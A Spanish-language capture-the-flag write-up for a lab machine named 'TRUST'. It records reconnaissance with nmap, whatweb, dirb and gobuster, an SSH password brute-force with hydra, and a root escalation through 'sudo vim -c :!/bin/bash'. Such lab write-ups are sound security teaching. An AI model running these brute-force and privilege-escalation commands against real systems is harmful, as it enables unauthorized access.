Máquina TRUST

Fecha: 08 de Marzo de 2025

Objetivo: 172.18.0.2

Fase de reconocimiento

Comenzamos haciendo un ping a la máquina para ver si nos contesta.

ping 172.18.0.2

Lanzamos el comando NMAP, con los parámetros -sV y -O.

nmap -sV 172.18.0.2 -O

Acabamos de averiguar que la máquina objetivo dispone de los puertos 80 y 22 abiertos, y funcionando actualmente.

• 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)

• 80/tcp open http Apache httpd 2.4.57 ((Debian))

Vamos a visitar la web, para ver que nos arroja el puerto 80.

Vemos que nos retorna la página de configuración del servidor Apache Web Service. Vamos a probar con los ficheros robots.txt y sitemap.xml para ver si contienen información.

No existen los ficheros robots.txt, ni el sitemap.xml.

Vamos a ver que nos reporta Wappalyzzer y podemos ver que nos dice que se trata de un servidor Linux, con un "Apache HTTP Service" y una distribución Debian.

Probamos con el comando whatweb con el parámetro -v y nos reporta lo siguiente.

whatweb 172.18.0.2 -v

Hice un dirb para hallar directorios ocultos y me encontré con el siguiente output del comando.

dirb http://172.18.0.2

He encontrado una zona llamada server-status, pero al intentar navegar y acceder a esa parte me aparece lo siguiente.

Al intentar navegar me dice que tengo el acceso prohíbido.

Vamos a hacer un poco de Fuzzing. El Fuzzing consiste en una metodología en la que enviaremos datos aleatorios o modificados a una aplicación web con el objetivo de provocar errores o descubrir vulnerabilidades.

Primero buscaremos los directorios afectados.

gobuster dir -u http://172.18.0.2 -w /usr/share/wordlists/dirb/common.txt -t 30 -o results.txt

El comando nos reporta esta salida

Ahora que ya hemos extraido los directorios, buscaremos en los ficheros.

gobuster dir -u http://172.18.0.2 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 30 -o results_files.txt

Podemos ver que hay 3 ficheros en verde que nos devuelven un código 200.

Hemos visitado la web objetivo 172.18.0.2/secret.php y hemos encontrado esto.

Fase de Explotación

Lo único que se me ocurre es hacer fuerza bruta al puerto 22 (ssh) pero no se si existe otra solución.

Para ello solo conozco en estos momentos, hydra. Lanzaremos pues el comando para averiguar el password mediante hydra.

hydra -l mario -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://172.18.0.2

Fase de Post-Explotación

Una vez obtenidas las credenciales del usuario. Podemos acceder a la máquina objetivo mediante SSH.

ssh mario@172.18.0.2

Introducimos la password encontrada anteriormente chocolate, y estamos dentro.

Ahora deberíamos buscar los ficheros vulnarables que tenga comprometidos la máquina a nivel de sistema que el SUID sea del usuario root. Para ello lanzaremos el siguiente comando

find / -perm -4000 -user root 2>/dev/null

Vemos que la salida del comando nos retorna todos estos ficheros.

Probamos a ver si nos permite ejecutar algo como root.

sudo -l

Vemos que podemos ejecutar sobre vim. Sino sabemos como explotarlo, siempre podemos consultar GTFOBins

sudo vim -c ':!/bin/bash'

Y si hacemos un whoami podemos ver que ya somos root.